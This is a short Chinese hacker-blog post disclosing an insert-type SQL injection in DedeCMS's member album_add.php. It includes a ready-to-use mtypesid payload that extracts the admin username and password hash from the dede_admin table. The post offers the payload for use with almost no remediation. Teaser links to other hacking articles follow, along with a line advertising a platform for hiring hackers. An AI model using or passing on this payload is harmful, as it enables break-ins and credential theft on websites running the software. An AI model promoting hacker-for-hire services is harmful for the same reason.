Dedecms某一处insert型注入

hacker5年前 (2020-05-31)黑客文章714

Dedecms一处注入，较鸡肋，之前变量覆盖的漏洞太轰动了，所以一直没发出，之前5月份最新版本测试的，目前最新版本应该是没修复的
漏洞需要会员，所以比较鸡肋啦!
发表文章处，post表单的mtypesid可以注入

/dedecmsnew/member/album_add.php

注入的代码：

mtypesid=1'),("'",'0','1367930810','p','0','2','-1','0','0',(SELECT concat(userid,0x5f,pwd,0x5f) FROM dede_admin where userid='admin'),'',

'','12333','','','1367930810','1367930810','4','image','test','3')#@`'`'

标签: 黑客技术

返回列表

前言：即是高级技巧，其它基本的注入方法就不详述了。看不懂可查本站的注入基础文章。为了更好的用好注入，建议大家看看本站的SQL语法相关文章 [获取全部数据库名] select name...

1、肉食鸡：说白了“肉食鸡”是一种很品牌形象的形容，形容这些能够随便被大家操纵的电脑上，另一方能够是WINDOWS系统软件，还可以是UNIX/LINUX系统软件，能够是一般的个人计算机，还可以是大...

什么叫OpenSSL？这不是严格意义上来说是一个“黑客工具”，只是一个新项目（称之为“OpenSSL新项目”），致力于将详细的商业服务解决方法融合给网络信息安全专业人员出示安裝安全性套接字层（SS...

本文介绍一个用C语言和网络数据包分析开发工具实现的简易网络Sniffer。目前，已经有不少的Sniff工具软件，如Windows环境下，最富盛名的工具是Netxray和Sniffer pro，用它们在...

《网络黑白》该书是“花无际”著作。文件目录以下：第一章您好网络黑客我的安全性之途网络黑客发展史对安全性的思索怎样学习网络黑客百度搜索引擎英语的语法网络黑客武器尖刀普遍进攻方式被...

要想更好的保护网络不受黑客的攻击，就必须对黑客的攻击方法、攻击原理、攻击过程有深入的、详细的了解，只有这样才能更有效、更具有针对性的进行主动防护。下面通过对黑客攻击方法的特征分析，来研究如...

找黑客平台